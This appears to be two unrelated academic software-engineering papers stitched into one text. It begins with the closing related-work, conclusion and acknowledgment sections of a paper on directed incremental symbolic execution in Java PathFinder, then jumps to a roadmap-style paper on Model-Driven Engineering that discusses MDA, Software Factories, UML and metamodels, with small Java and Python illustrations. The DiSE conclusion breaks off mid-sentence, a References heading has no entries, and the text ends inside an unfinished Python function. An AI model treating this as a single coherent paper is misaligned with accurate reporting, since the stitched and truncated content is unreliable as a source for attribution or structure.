The Java PathFinder model checker [36] has previously been used for incremental checking of programs that undergo changes [24, 39]. Incremental state-space exploration (ISSE) [24] focuses on evolving programs and stores the explored state space graph to use it for checking a subsequent version of the program, and reduces the time necessary for state-space exploration by avoiding the execution of some transitions and related computations that are not necessary. Regression model checking (RMC) [39] presents a complementary approach to ISSE and uses the difference between two versions to drive the pruning of the state space when model checking the new version. RMC computes reachable program coverage elements, e.g., basic blocks, for each program state during a recording mode run of RMC on the original version. Impact analysis is then used to calculate dangerous elements whose behavior may now differ because of changes. This is done by comparing the bytecodes and control-flow graphs for the two program versions. The dangerous elements information is then combined with the reachable elements information to prune safe sub-state spaces during a pruning mode run of RMC on the modified version of the program. DiSE takes inspiration from RMC and supports incremental symbolic execution, which is not addressed by RMC and ISSE. Moreover, a key difference between DiSE and previous work is that to analyze the current program version DiSE does not require the availability of the internal states of the previous analysis run – ISSE requires the state-space graph and RMC requires the dynamic reachability information for program coverage elements.
# 7. Conclusions and Future Work
In this paper, we introduced Directed Incremental Symbolic Execution (DiSE), a novel technique that leverages program differences to guide symbolic execution to explore and characterize the effects of program changes. We implemented DiSE in the symbolic execution extension of the Java PathFinder verification framework, and evaluated its cost and effectiveness on methods from three Java applications. The results of our case study demonstrate that DiSE efficiently generates the set of path conditions affected by the change(s) to a program. We demonstrate the utility of our technique by using DiSE results to perform test case selection and test input generation for the examples in our study.
DiSE is an intra-procedural, incremental analysis technique that generates and characterizes method-level differences. DiSE does not generate affected path conditions arising from the control and
# Acknowledgments
The authors gratefully acknowledge the contributions of Matt Dwyer and Gregg Rothermel to early work on DiSE. The authors also thank Eric Mercer for the helpful comments to improve the paper. The work of Yang and Khurshid was supported in part by the NSF under Grant Nos. IIS-0438967 and CCF-0845628, and AFOSR grant FA9550-09-1-0351.
# References
# Abstract
The term Model-Driven Engineering (MDE) is typically used to describe software development approaches in which abstract models of software systems are created and systematically transformed to concrete implementations. In this paper we give an overview of current research in MDE and discuss some of the major challenges that must be tackled in order to realize the MDE vision of software development. We argue that full realizations of the MDE vision may not be possible in the near to medium-term primarily because of the wicked problems involved. On the other hand, attempting to realize the vision will provide insights that can be used to significantly reduce the gap between evolving software complexity and the technologies used to manage complexity.
# 1. Introduction
Advances in hardware and network technologies have paved the way for the development of increasingly pervasive software-based systems of systems that collaborate to provide essential services to society. Software in these systems is often required to (1) operate in distributed and embedded computing environments consisting of diverse devices (personal computers, specialized sensors and actuators), (2) communicate using a variety of interaction paradigms (e.g., SOAP messaging, media streaming), (3) dynamically adapt to changes in operating environments, and (4) behave in a dependable manner [26, 62]. Despite significant advances in programming languages and supporting integrated development environments (IDEs), developing these complex software systems using current code-centric technologies requires herculean effort.
A significant factor behind the difficulty of developing complex software is the wide conceptual gap between the problem and the implementation domains of discourse. Bridging the gap using approaches that require extensive handcrafting of implementations gives rise to accidental complexities that make the development of complex software difficult and costly. To an extent, handcrafting complex software systems can be likened to building pyramids in ancient Egypt. We marvel at these software implementations in much the same way that archaeologists marvel at the pyramids: The wonder is mostly based on an appreciation of the effort required to tackle the significant accidental complexities arising from the use of inadequate technologies.
The growing complexity of software is the motivation behind work on industrializing software development. In particular, current research in the area of model driven engineering (MDE) is primarily concerned with reducing the gap between problem and software implementation domains through the use of technologies that support systematic transformation of problem-level abstractions to software implementations. The complexity of bridging the gap is tackled through the use of models that describe complex systems at multiple levels of abstraction and from a variety of perspectives, and through automated support for transforming and analyzing models. In the MDE vision of software development, models are the primary artifacts of development and developers rely on computer-based technologies to transform models to running systems.
Current work on MDE technologies tends to focus on producing implementation and deployment artifacts from detailed design models. These technologies use models to generate significant parts of (1) programs written in languages such as Java, C++, and C♯ (e.g., see Compuware’s OptimalJ, IBM’s Rational XDE package, and Microsoft’s Visual Studio), and (2) integration and deployment artifacts such as XML-based configuration files and data bridges used for integrating disparate systems (e.g., see [25]).
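The kind of model-to-code generation these technologies perform can be illustrated in miniature: a tiny class "model" (a name plus typed attributes) is transformed into a Java source skeleton. The model representation below is invented for illustration and does not correspond to any particular tool's metamodel.

```java
import java.util.*;

// Toy model-to-code transformation: turn a class "model" into a Java
// source skeleton with one private field per model attribute. Real MDE
// tools do the same kind of traversal over far richer metamodels.
public class CodeGenerator {
    public static String generate(String className, Map<String, String> attributes) {
        StringBuilder src = new StringBuilder();
        src.append("public class ").append(className).append(" {\n");
        for (Map.Entry<String, String> attr : attributes.entrySet()) {
            // attribute name -> declared type, emitted as a private field
            src.append("    private ").append(attr.getValue())
               .append(" ").append(attr.getKey()).append(";\n");
        }
        src.append("}\n");
        return src.toString();
    }
}
```

Even this toy shows the essential property being exploited: the model and the generated artifact live in the same engineering medium, so the transformation is mechanical.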
Attempts at building complex software systems that dynamically adapt to changes in their operating environments have led some researchers to consider the use of models during runtime to monitor and manage the executing software. Early work in this emerging MDE area was presented at a MODELS 2006 Workshop on runtime models [8].
We envisage that MDE research on runtime models will pave the way for the development of environments in which change agents (e.g., software maintainers, software-based agents) use runtime models to modify executing software in a controlled manner. The models act as interfaces that change agents can use to adapt, repair, extend, or retrofit software during its execution. In our broad vision of MDE, models are not only the primary artifacts of development, they are also the primary means by which developers and other systems understand, interact with, configure and modify the runtime behavior of software.
A major goal of MDE research is to produce technologies that shield software developers from the complexities of the underlying implementation platform. An implementation platform may consist of networks of computers, middleware, and libraries of utility functions (e.g., libraries of persistence, graphical user interface, and mathematical routines). In the case of MDE research on runtime models, the goal is to produce technologies that hide the complexities of runtime phenomena from agents responsible for managing the runtime environment, and for adapting and evolving the software during runtime.
Realizing the MDE vision requires tackling a wide range of very difficult, interrelated social and technical problems that have been the focus of software engineering research over the last three decades. For this reason, we consider the problem of developing MDE technologies that automate significant portions of the software lifecycle to be a wicked problem. A wicked problem has multiple dimensions that are related in complex ways and thus cannot be solved by simply cobbling together solutions to the different problem dimensions (see the definition of “wicked problem” in Wikipedia). Solutions to wicked problems are expensive to develop and are invariably associated with other problems, but the development of the solutions can deepen understanding of the problems.
In this paper we discuss some of the major technical problems and challenges associated with realizing the broad MDE vision we outline above. We also mention the social challenges related to identifying and leveraging high-quality modeling experience in MDE research.
In Section 2 we describe software development as a modeling activity and present the research questions that should drive MDE research. In Section 3 we discuss the factors that contribute to the difficulty of bridging the gap between the problem and implementation domains, present classes of challenges and problems discussed in this paper, and discuss the relationship between MDE and other areas of software engineering research. In Section 4 we provide background on some of the major MDE initiatives. In Section 5, Section 6, and Section 7, we discuss MDE research challenges in the areas of modeling languages, separation of concerns, and model manipulation and management, respectively. Section 7 also includes a discussion on opportunities for using models during runtime. We conclude in Section 8 by outlining an idealistic vision of an MDE environment.
# 2. The Value of Modeling
In this paper, a model is an abstraction of some aspect of a system. The system described by a model may or may not exist at the time the model is created. Models are created to serve particular purposes, for example, to present a human understandable description of some aspect of a system or to present information in a form that can be mechanically analyzed (e.g., see [54, 30]).
It may seem that work on MDE centers on the development and use of the popular modeling language, UML (the Unified Modeling Language) [59]. The UML standardization effort has played a vital role in bringing together a community that focuses on the problem of raising the level of abstraction at which software is developed, but research around other modeling languages is contributing valuable MDE concepts, techniques, tools and experience. In this paper, MDE encompasses all research pertaining to the use of software models.
Non-UML modeling approaches that are included in our use of the MDE term include specifying systems using formal specification languages such as Alloy [32] and B [2], modeling and analyzing control system software using the math-based, high-level programming language Matlab/Simulink/Stateflow (e.g., see [34]), analyzing performance, load, safety, liveness, reliability, and other system properties using specialized modeling techniques (e.g., see [40]), and building models to analyze software risks (e.g., see [20, 27, 50]).
Source code can be considered to be a model of how a system will behave when executed. While we may draw inspiration from work on the development of programming languages and compilers, this paper is primarily concerned with the development and use of models other than source code. Specifically, we focus attention on the following two broad classes of models:
• **Development models:** These are models of software at levels of abstraction above the code level. Examples of development models are requirements, architectural, implementation and deployment models. MDE research has tended to focus on the creation and use of these models.
• **Runtime models:** These models present views of some aspect of an executing system and are thus abstractions of runtime phenomena. A growing number of MDE
researchers have started to explore how models can be used to support dynamic adaptation of software-based systems.
As MDE research matures, the above classification may become dynamic, that is, development models may be used as runtime models and runtime models may be used to evolve software systems, thus acting as development models.
There is a perception that development models are primarily documentation artifacts and thus their creation and use are peripheral to software development. This narrow perspective has led to recurring and seemingly futile debates on the practical value of modeling (i.e., the value of documentation) in software development. MDE advocates point out that models can be beneficially used for more than just documentation during development. For example, Bran Selic, an IBM Distinguished Engineer, points out an important property of software that MDE seeks to exploit: “Software has the rare property that it allows us to directly evolve models into full-fledged implementations without changing the engineering medium, tools, or methods.” Selic and others argue that modeling technologies leveraging this property can significantly reduce the accidental complexities associated with handcrafting complex software [60].
The formal methods community attempted to leverage this property in work on transformation-based software development in which declarative specifications are systematically transformed to programs (e.g., see [7]). One of the valuable insights gained from these attempts is that automation of significant aspects of the transformation of a high-level specification to an implementation requires encoding domain-specific knowledge in the transformation tools. Challenges associated with developing and using domain-specific technologies will be discussed in Section 5.
The process of analyzing a problem, conceiving a solution, and expressing a solution in a high-level programming language can be viewed as an implicit form of modeling and thus one can argue that software development is essentially a model-based problem solving activity. The mental models of the system held by developers while creating programs may be shared with others using informal “whiteboard” sketches or more formally as statements (including diagrams) in a modeling language. These mental models evolve as a result of discussions with other developers, changes in requirements, and errors identified in code tests, and they guide the development of handcrafted code. Writing source code is a modeling activity because the developer is modeling a solution using the abstractions provided by a programming language.
Given that the technical aspects of software development are primarily concerned with creating and evolving models, questions about whether we should or should not use models seem superfluous. A more pertinent question is “Can modeling techniques be more effectively leveraged during software development?” From this perspective, the research question that should motivate MDE research on creation and use of development models is the following:
How can modeling techniques be used to tame the complexity of bridging the gap between the problem domain and the software implementation domain?
Henceforth, we will refer to this gap as the problem-implementation gap.
We propose that MDE research on runtime models focus on the following research questions:
- How can models be cost-effectively used to manage executing software? Management can involve monitoring software behavior and the operating context, and adapting software so that it can continue to provide services when changes are detected in operating conditions.
- How can models be used to effect changes to running systems in a controlled manner? Research in this respect will focus on how models can be used as interfaces between running systems and change agents, where a change agent can be a human developer or a software agent.
There is currently very little work on the runtime modeling questions and thus there is very little research experience that can be used to bound possible solutions. We discuss some of the challenges we envisage in Section 7.3, but this paper focuses on development models primarily because current MDE research provides significant insights into associated challenges and problems.
3. MDE Research Concerns
MDE research on development models focuses on developing techniques, methods, processes and supporting tools that effectively narrow the problem-implementation gap. Exploring the nature of the problem-implementation gap can yield insights into the problems and challenges that MDE researchers face.
3.1. Bridging the Gap
A problem-implementation gap exists when a developer implements software solutions to problems using abstractions that are at a lower level than those used to express the problem. In the case of complex problems, bridging the gap using methods that rely almost exclusively on human effort will introduce significant accidental complexities [60].
The introduction of technologies that effectively raise the implementation abstraction level can significantly improve productivity and quality with respect to the types of software targeted by the technologies. The introduction and successful use of the technologies will inevitably open the door to new software opportunities that are acted upon. The result is a new generation of more complex software systems and associated software development concerns. For example, the introduction of middleware technologies, coupled with improvements in network and mobile technologies, has made it possible to consider the development of more complex distributed systems involving fixed and mobile elements.
The growing complexity of newer generations of software systems can eventually overwhelm the available implementation abstractions, resulting in a widening of the problem-implementation gap. The widening of the gap leads to dependence on experts who have built up an arsenal of mentally-held development patterns (a.k.a. “experience”) to cope with growing complexity.
Growing software complexity will eventually overwhelm the mentally-held experience and the need for technologies that leverage explicit forms of experience (e.g., domain-specific design patterns) to further raise the level of abstraction at which software is developed will become painfully apparent. The development of such technologies will result in work on even more complex software systems, thus triggering another cycle of work on narrowing the problem-implementation gap.
The preceding discussion indicates that research on narrowing the problem-implementation gap tends to progress through a series of crisis-driven cycles. Each cycle results in a significant change in the level of abstraction at which software is developed, which then triggers attempts at building even more complex software. This characterization acknowledges that software development concerns and challenges evolve with each new generation of software systems, that is, the nature of the so-called “software crisis” evolves.
To cope with the ever-present problem of growing software complexity, MDE researchers need to develop technologies that developers can use to generate domain-specific software development environments. These environments should consist of languages and tools that are tailored to the target classes of applications. Developing such technologies requires codifying knowledge that reflects a deep understanding of the common and variable aspects of the gap bridging process. Such an understanding can be gained only through costly experimentation and systematic accumulation and examination of experience. Developing such technologies is thus a wicked problem.
While it may not be possible to fully achieve the MDE vision, close approximations can significantly improve our ability to manage the problem-implementation gap. We see no alternative to developing close approximations other than through progressive development of technologies, where each new generation of technologies focuses on solving the problems and minimizing the accidental complexities arising from use of older generations of technologies.
The importance of industrial participation in MDE research should not be underestimated. Industrial feedback on techniques and technologies developed within academia is needed to gain a deeper understanding of development problems.
3.2. A Classification of MDE Challenges
The major challenges that researchers face when attempting to realize the MDE vision can be grouped into the following categories:
- **Modeling language challenges**: These challenges arise from concerns associated with providing support for creating and using problem-level abstractions in modeling languages, and for rigorously analyzing models.
- **Separation of concerns challenges**: These challenges arise from problems associated with modeling systems using multiple, overlapping viewpoints that utilize possibly heterogeneous languages.
- **Model manipulation and management challenges**: These challenges arise from problems associated with (1) defining, analyzing, and using model transformations, (2) maintaining traceability links among model elements to support model evolution and roundtrip engineering, (3) maintaining consistency among viewpoints, (4) tracking versions, and (5) using models during runtime.
Section 5 to Section 7 present some of the major challenges in these categories.
3.3. Relationship with Software Engineering Research
Realizing the MDE vision of software development will require evolving and integrating research results from different software engineering areas. There are obvious connections with work on requirements, architecture and detailed design modeling, including work on viewpoint conflict analysis and on feature interaction analysis. Research in these areas has produced modeling concepts, languages, and techniques that address specific concerns in the areas.
MDE research should leverage and integrate the best results from these areas and build synergistic research links with the communities. For example, the challenges faced by researchers in the software architecture area (see [58]) are closely related to MDE challenges and there have been beneficial interactions across the two communities.
Work on formal specification techniques (FSTs) is particularly relevant to MDE. Modeling languages must have formally defined semantics if they are to be used to create analyzable models. Work on developing formal analysis techniques for models utilizes and builds on work in the formal specification research area. While it is currently the case that popular modeling languages have poorly defined semantics, there is a growing realization that MDE requires semantic-based manipulation of models and thus appropriate aspects of modeling languages must be formalized.
It may seem that MDE research can be subsumed by FST research. A closer examination of research results and goals in these areas suggests that this is not the case. The FSTs that have been developed thus far use languages that allow developers to describe systems from a very small number of viewpoints. For example, Z [53] describes systems from data and operation viewpoints, model checking techniques (e.g., see [49]) are applicable to models created using a state transition viewpoint, and Petri nets [48] can be used to describe systems from a control flow viewpoint. It is well known that the more expressive a modeling language is, the more intractable the problem of developing mechanical semantic analysis techniques becomes. It should not be surprising then that FSTs restrict their viewpoints.
In MDE, a model of a complex system consists of many views created using a wide variety of viewpoints. Furthermore, FSTs focus on describing functionality, while MDE approaches aim to provide support for modeling structural and functional aspects as well as system attributes (sometimes referred to as “non-functional” aspects).
The differences in research scopes indicate that MDE provides a context for FST research. There is often a need to formally analyze a subset of the views in an MDE model. Members of the FST and the MDE communities need to collaborate to produce formal techniques that can be integrated with rich modeling languages.
The following gives some of the other major software engineering research areas that influence MDE work:
- **Systematic reuse of development experience**: Leveraging explicit forms of development experience to industrialize software development has been the focus of research in the systematic reuse community for over two decades (e.g., see [4, 6, 21, 29, 33]). The term “software factory” was used in the systematic reuse community to refer to development environments that effectively leveraged reusable assets to improve productivity and quality [14]. The term is now being used by Microsoft as a label for its MDE initiative (see Section 4). Research on design patterns, domain-specific languages, and product-line architectures are particularly relevant to work on MDE (e.g., see [38]).
- **Systematic software testing**: Work on systematic testing of programs is being leveraged in work on dynamically analyzing models. For example, there is work on defining test criteria for UML models that are UML-specific variations of coverage criteria used at the code level [3], and tools that support systematic testing of models [18]. There is also work on generating code level tests from models that builds upon work in the specification-based code testing area (e.g., see [10, 43]).
- **Compilation technologies**: Work on optimizing compilers may be leveraged by MDE researchers working on providing support for generating lean and highly optimized code. Work on incremental compilation may also be leveraged in research on incremental code generation.
It can be argued that MDE is concerned with providing automated support for software engineering, and thus falls in the realm of computer-aided software engineering (CASE) research. MDE can and should be viewed as an evolution of early CASE work. MDE researchers are (knowingly or unknowingly) building on the experience and work of early CASE researchers. Unlike early CASE research, which focused primarily on the use of models for documenting systems (e.g., see [17, 19, 24]), MDE research is concerned with broadening the role of models so that they become the primary artifacts of software development. This broadening of the scope is reflected in the range of software engineering research areas that currently influence MDE research.
The need to deal with the complexity of developing and operating adaptive software provides another opportunity for the use of MDE techniques. In this paper, MDE encompasses work that seeks to develop a new generation of CASE environments that address the entire life-cycle of software, from conceptualization to retirement. It is concerned not only with the use of models for engineering complex software, but also with the use of models during the execution of software.
The term “model driven” may be considered by some to be redundant in MDE given that engineering of software invariably involves modeling. While this may be true, it is currently the case that software developers seldom create and effectively utilize models other than code. The term “model driven” in MDE is used to emphasize a shift away from code level abstractions. Only when modeling at various levels of abstraction is widely viewed as an essential part of engineering software should the “model driven” term be dropped. The availability of good modeling tools can help in this respect.
4. Major Model Driven Engineering Initiatives
In this section we present an overview of some major MDE initiatives that are currently shaping the research landscape and discuss the relationship between MDE and other software engineering research areas.
4.1. Model Driven Architecture
The OMG, in its role as an industry-driven organization that develops and maintains standards for developing complex distributed software systems, launched the Model Driven Architecture (MDA) as a framework of MDE standards in 2001 [60, 51]. The OMG envisages MDA technologies that will provide the means to (1) more easily integrate new implementation infrastructures into existing designs, (2) generate significant portions of application-specific code, configuration files, data integration bridges, and other implementation infrastructure artifacts from models, (3) more easily synchronize the evolution of models and their implementations as the software evolves, and (4) rigorously simulate and test models.
MDA advocates modeling systems from three viewpoints: computation independent, platform independent, and platform specific viewpoints. The computation independent viewpoint focuses on the environment in which the system of interest will operate and on the required features of the system. Modeling a system from this viewpoint results in a computation independent model (CIM). The platform independent viewpoint focuses on the aspects of system features that are not likely to change from one platform to another. A platform independent model (PIM) is used to present this viewpoint. The OMG defines a platform as “a set of subsystems and technologies that provide a coherent set of functionality through interfaces and specified usage patterns”. Examples of platforms are technology-specific component frameworks such as CORBA and J2EE, and vendor-specific implementations of middleware technologies such as Borland’s VisiBroker, IBM’s WebSphere, and Microsoft’s .NET.
Platform independence is a quality of a model that is measured in degrees [60]. The platform specific viewpoint provides a view of a system in which platform specific details are integrated with the elements in a PIM. This view of a system is described by a platform specific model (PSM). Separation of platform specific and platform independent details is considered the key to providing effective support for migrating an application from one implementation platform to another.
The pillars of MDA are the Meta Object Facility (MOF), a language for defining the abstract syntax of modeling languages [44], the UML [59], and the Query, View, Transformation standard (QVT), a standard for specifying and implementing model transformations (e.g., PIM to PSM transformations) [46].
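To make the role of QVT-style transformations concrete, the sketch below maps a platform-independent entity description to a platform-specific one by weaving in platform details. The "platform", the naming rules, and the `pim_to_psm` function are invented for illustration; real QVT transformations are declarative specifications over MOF metamodels, not ad hoc Python functions.

```python
# Hypothetical PIM-to-PSM mapping in the spirit of MDA: platform-specific
# artifacts are derived mechanically from a platform-independent model.
def pim_to_psm(entity, platform="J2EE"):
    """Rewrite a PIM entity into a PSM entity for the given platform."""
    return {
        "name": entity["name"],
        "platform": platform,
        # Platform-specific artifacts derived from the PIM element's name.
        "artifacts": {
            "interface": f"{entity['name']}Local",
            "bean": f"{entity['name']}Bean",
            "table": entity["name"].upper(),
        },
        "attributes": dict(entity["attributes"]),
    }

pim = {"name": "Order", "attributes": {"id": "Integer", "total": "Currency"}}
psm = pim_to_psm(pim)
print(psm["artifacts"]["bean"])   # OrderBean
```

Because the derivation is mechanical, regenerating the PSM after a PIM change is cheap, which is the synchronization benefit the MDA standards aim for.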
4.2. Software Factories
Information about the Microsoft Software Factory initiative became widely available when a book on the topic was published in 2004 [28]. The initiative focuses on the development of MDE technologies that leverage domain-specific knowledge to automate software modeling tasks.
Software Factories tackle the complexity of bridging the gap by providing developers with a framework for producing development environments consisting of domain-specific tools that help automate the transformation of abstract models to implementations. Each development environment is defined as a graph of viewpoints, where each viewpoint describes systems in the application domain from the perspective of some aspect of the development lifecycle (e.g., from a requirements capture or a database design perspective). Reusable forms of development experience (e.g., patterns, templates, guidelines, transformations) are associated with each viewpoint, and thus accessible in the context of that viewpoint. This reduces the need to search for applicable forms of reusable experience, and enables context-based validation, and guidance delivery and enactment [28].
The relationships between viewpoints define semantic links between elements in the viewpoints. For example, the relationships can be used to relate work carried out in one development phase with work performed in another phase, or to relate elements used to describe an aspect of the system with elements used to describe a different aspect. In summary, the Software Factory initiative is concerned with developing technologies that can be used to create development environments for a family of applications.
There are three key elements in a realization of the Software Factory vision:
- **Software factory schema**: This schema is a graph of viewpoints defined using Software Factory technologies. It describes a product line architecture in terms of DSMLs to be used, and the mechanisms to be used to transform models to other models or to implementation artifacts.
- **Software factory template**: A factory template provides the reusable artifacts, guidelines, samples, and custom tools needed to build members of the product family.
- **An extensible development environment**: To realize the software factory vision, a framework that can be configured using the factory schema and template to produce a development environment for a family of products is needed. The Microsoft Visual Studio Team System has some elements of this framework and there is ongoing work on extending its capabilities.
4.3. Other MDE Approaches
Other notable work in the domain-specific modeling vein is the work of Xactium on providing support for engineering domain-specific languages (see http://www.xactium.com), and the work at Vanderbilt University on the Generic Modeling Environment (GME) (see http://www.isis.vanderbilt.edu/projects/gme/). Both approaches are based on the MOF standard of MDA and provide support for building MOF-based definitions of domain-specific modeling languages. The MOF is used to build models, referred to as metamodels, that define the abstract syntax of modeling languages. While these approaches utilize MDA standards they do not necessarily restrict their modeling viewpoints to the CIM, PIM and PSM. The Xactium approach, in particular, is based on an adaptive tool framework that uses reflection to adapt a development environment as its underlying modeling language changes: If extensions are made to the modeling language the environment is made aware of it through reflection and can thus adapt.
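The idea that a metamodel defines the abstract syntax a model must conform to can be sketched very simply. The toy metamodel and the `conforms` check below are hypothetical; real MOF-based environments such as GME and XMF provide far richer metamodeling and constraint facilities.

```python
# Illustrative sketch: a metamodel declares, per metaclass, the attributes
# (and their types) that conforming model elements must carry.
METAMODEL = {
    "StateMachine": {"name": str, "states": list},
    "State":        {"name": str, "initial": bool},
}

def conforms(element_type, element, metamodel=METAMODEL):
    """Check that a model element carries exactly the attributes its
    metaclass declares, with the declared types."""
    spec = metamodel.get(element_type)
    if spec is None:
        return False          # no such metaclass in the metamodel
    return (set(element) == set(spec) and
            all(isinstance(element[attr], t) for attr, t in spec.items()))

idle = {"name": "Idle", "initial": True}
print(conforms("State", idle))                          # well-formed
print(conforms("State", {"name": 1, "initial": True}))  # wrong attribute type
```

A tool generated from such a metamodel can reject ill-formed models at edit time, which is the practical payoff of defining abstract syntax explicitly.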
A major MDE initiative from academia is Model Integrated Computing (MIC) [57]. The MIC initially started out with a focus on developing support for model driven development of distributed embedded real-time systems. There is now work taking place within the OMG to align the MIC and MDA initiatives (e.g., see http://mic.omg.org/).
5. Modeling Language Challenges
The following are two major challenges that architects of MDE modeling languages face:
- **The abstraction challenge**: How can one provide support for creating and manipulating problem-level abstractions as first-class modeling elements in a language?
- **The formality challenge**: What aspects of a modeling language’s semantics need to be formalized in order to support formal manipulation, and how should the aspects be formalized?
Two schools of thought on how to tackle the abstraction challenge have emerged in the MDE community:
- **The Extensible General-Purpose Modeling Language School**: The abstraction challenge is tackled by providing a base general-purpose language with facilities to extend it with domain-specific abstractions (i.e., abstractions that are specific to a problem domain).
- **The Domain Specific Modeling Language School**: The challenge is tackled by defining domain specific languages using meta-metamodeling mechanisms such as the OMG’s MOF. The focus of work in this area is on providing tool support for engineering modeling languages. The products of Xactium, MetaCase, and Microsoft provide examples of current attempts at producing such tools.
It is important to note that the research ideas, techniques and technologies from these two schools are not mutually exclusive. Extensible modeling languages and meta-metamodeling technologies can both play vital roles in an MDE environment. We envisage that research in both schools will provide valuable insights and research results that will lead to a convergence of ideas.
5.1. Learning from the UML Experience: Managing Language Complexity
“It is easier to perceive error than to find truth, for the former lies on the surface and is easily seen, while the latter lies in the depth, where few are willing to search for it.” – Johann Wolfgang von Goethe
An extensible, general-purpose modeling language should provide, at least, (1) abstractions above those available at the code level that support a wide variety of concepts in known problem domains, and (2) language extension mechanisms that allow users to extend or specialize the language to provide suitable domain-specific abstractions for new application domains.
The Extensible Modeling Language school is exemplified by work on the UML. There are significant benefits to having a standardized extensible general-purpose modeling language such as the UML. For example, such a language facilitates communication across multiple application domains and makes it possible to train modelers that can work in multiple domains.
The UML is also one of the most widely critiqued modeling languages (e.g., see [22, 31]). Despite its problems, there is no denying that the UML standardization effort is playing a vital role as a public source of insights into problems associated with developing practical software modeling languages.
A major challenge faced by developers of extensible general-purpose modeling languages is identifying a small base set of modeling concepts that can be used to express a wide range of problem abstractions. The UML standardization process illustrates the difficulty of converging on a small core set of extensible concepts. One of the problems is that there is currently very little analyzable modeling experience that can be used to distill a small core of extensible modeling concepts. One way to address this problem is to set up facilities for collecting, analyzing and sharing modeling experience, particularly from industry. There are a number of initiatives that seek to develop and maintain a repository of modeling experience, for example PlanetMDE (see http://planetmde.org/) and REMODD (see http://lists.cse.msu.edu/cgi-bin/mailman/listinfo/remodd). Collecting relevant experience from industry will be extremely challenging. Assuring that intellectual property rights will not be violated and overcoming the reluctance of organizations to share artifacts for fear that analysis will reveal embarrassing problems are some of the challenging problems that these initiatives must address.
The complexity of languages such as the UML is reflected in their metamodels. Complex metamodels are problematic for developers who need to understand and use them. These include developers of MDE tools and transformations. The complexity of metamodels for standard languages such as the UML also presents challenges to the groups charged with evolving the standards [22]. An evolution process in which changes to a metamodel are made and evaluated manually is tedious and error prone. Manual techniques make it difficult to (1) establish that changes are made consistently across the metamodel, (2) determine the impact changes have on other model elements, and (3) determine that the modified metamodel is sound and complete. It is important that metamodels be shown to be sound and complete. Conformance mechanisms can then be developed and used by tool vendors to check that their interpretations of rules in the metamodel are accurate.
Tools can play a significant role in reducing the accidental complexities associated with understanding and using large metamodels. For example, a tool that extracts metamodel views of UML diagram types consisting only of the concepts and relationships that appear in the diagrams can help one understand the relationships between visible elements of a UML diagram. A more flexible and useful approach is to provide tools that allow developers to query the metamodel and to extract specified views from the metamodel. Query/Extraction tools should be capable of extracting simple derived relationships between concepts and more complex views that consist of derived relationships among many concepts. Metamodel users can use such tools to better understand the UML metamodel, and to obtain metamodel views that can be used in the specification of patterns and transformations. Users that need to extend or evolve the UML metamodel can also use such tools to help determine the impact of changes (e.g., a query that returns a view consisting of all classes directly or indirectly related to a concept to be changed in a metamodel can provide useful information) and to check that changes are consistently made across the metamodel. The development of such tools is not beyond currently available technologies. Current UML model development tools have some support for manipulating the UML metamodel that can be extended with query and extraction capabilities that are accessible by users.
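The metamodel query idea above can be sketched as a reachability computation: viewing the metamodel as a graph of concepts and relationships, a query for the impact of changing a concept returns every concept directly or indirectly related to it. The tiny metamodel fragment below is invented for illustration and is not the actual UML metamodel.

```python
from collections import deque

# Hypothetical metamodel fragment: concept -> directly related concepts.
METAMODEL_EDGES = {
    "Classifier":  ["Class", "Association"],
    "Class":       ["Property", "Operation"],
    "Association": ["Property"],
    "Property":    [],
    "Operation":   ["Parameter"],
    "Parameter":   [],
}

def impacted_concepts(start, edges=METAMODEL_EDGES):
    """Breadth-first closure: every concept reachable from `start`, i.e.
    the candidates for impact analysis when `start` is changed."""
    seen, queue = {start}, deque([start])
    while queue:
        for nxt in edges.get(queue.popleft(), []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen

print(sorted(impacted_concepts("Class")))
# ['Class', 'Operation', 'Parameter', 'Property']
```

A real query/extraction tool would also materialize the derived relationships as a metamodel view, but the closure computation is the core of the impact query described above.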
Another useful tool that can ease the task of using the UML metamodel is one that takes a UML model and produces a metamodel view that describes its structure. Such a tool can be used to support compliance checking of models.
5.2. Learning from the UML Experience: Extending Modeling Languages
The UML experience provides some evidence that defining extension mechanisms that extend more than just the syntax of a language is particularly challenging. UML 2.0 supports two forms of extensions: Associating particular semantics to specified semantic variation points, and using profiles to define UML variants.
A semantic variation point is a semantic aspect of a model element that the UML allows a user to define. For example, the manner in which received events are handled by a state machine before processing is a semantic variation point for state machines: A modeler can decide to use a strict queue mechanism, or another suitable input handling mechanism. A problem with UML semantic variation points is that modelers are responsible for defining and communicating the semantics to model readers and tools that manipulate the models (e.g., code generators). UML 2.0 does not provide default semantics or a list of possible variations, nor does it formally constrain the semantics that can be plugged into variation points. This can lead to the following pitfalls: (1) Users can unwittingly assign a semantics that is inconsistent with the semantics of related concepts; and (2) failure to communicate a particular semantics to model readers and tools that analyze models can lead to misinterpretation and improper analysis of the models. The challenge here is to develop support for defining, constraining and checking the semantics plugged into semantic variation points.
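The event-handling variation point can be made concrete by treating the event pool policy as an explicit, pluggable parameter rather than an unstated assumption. The two policies below (a strict queue and a priority pool) are illustrative choices a modeler might plug in; the function names are hypothetical.

```python
import heapq
from collections import deque

def fifo_pool():
    """Strict queue semantics: events dispatched in arrival order."""
    q = deque()
    return q.append, q.popleft

def priority_pool():
    """Alternative semantics: events dispatched by priority."""
    h = []
    return (lambda e: heapq.heappush(h, e)), (lambda: heapq.heappop(h))

def dispatch_order(events, make_pool):
    """Feed events into the chosen pool and return dispatch order."""
    put, take = make_pool()
    for e in events:
        put(e)
    return [take() for _ in events]

events = [(2, "save"), (1, "abort"), (3, "close")]
print(dispatch_order(events, fifo_pool))      # arrival order
print(dispatch_order(events, priority_pool))  # priority order
```

The same event sequence yields different behavior under the two policies, which is precisely why a semantics left unstated at a variation point can lead tools and readers to misinterpret a model.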
Profiles are the primary mechanism for defining domain-specific UML variants. A UML profile describes how UML model elements are extended to support usage in a particular domain. For example, a profile can be used to define a variant of the UML that is suited for modeling J2EE software systems. UML model elements are extended using stereotypes and tagged values that define additional properties that are to be associated with the elements. The extension of a model element introduced by a stereotype must not contradict the properties associated with the model element. A profile is a lightweight extension mechanism and thus cannot be used to add new model elements or delete existing ones. New relationships between UML model elements can, however, be defined in a profile.
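The stereotype mechanism can be sketched as follows: a stereotype extends elements of one metaclass with tagged values and may not be applied elsewhere. The `EJBEntity` stereotype and its tags below are hypothetical and not taken from an actual OMG profile.

```python
# Hypothetical stereotype definition: which metaclass it extends and which
# tagged values it introduces.
STEREOTYPE = {
    "name": "EJBEntity",
    "extends": "Class",            # metaclass it may be applied to
    "tags": {"table", "schema"},   # tagged values it introduces
}

def apply_stereotype(element, stereotype, **tagged_values):
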